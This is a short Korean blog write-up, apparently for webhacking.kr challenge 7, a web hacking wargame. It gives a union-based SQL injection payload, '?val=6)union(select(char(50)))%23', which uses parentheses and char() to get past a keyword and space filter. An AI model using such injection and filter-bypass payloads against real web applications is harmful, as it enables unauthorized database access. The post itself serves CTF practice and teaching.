※ 작년 말 ~ 올해 초에 작성한 라이트업으로 사이트 개편 전의 문제가 섞여있습니다. ※
소스를 확인해보면 $data[0]이 2가 될 경우 문제가 풀린다. 따라서 union select 2를 이용해서 data에 직접 2라는 값을 넣어준다.
‘select lv from chall7 where lv=6 union select 2’
필터링 되는 것을 방지해서 url 뒤에 ?val=6)union(select(char(50)))%23이라고 우회해 입력한다. 괄호의 개수가 랜덤하게 바뀌므로 5번 정도 새로 고침하면 문제가 풀린다.
728x90
'CTF > 웹 해킹' 카테고리의 다른 글
webhacking.kr challenge 10 (0) | 2020.06.26 |
---|---|
webhacking.kr challenge 8 (0) | 2020.06.26 |
webhacking.kr challenge 6 (0) | 2020.06.26 |
webhacking.kr challenge 5 (0) | 2020.06.26 |
webhacking.kr challenge 3 (0) | 2020.06.26 |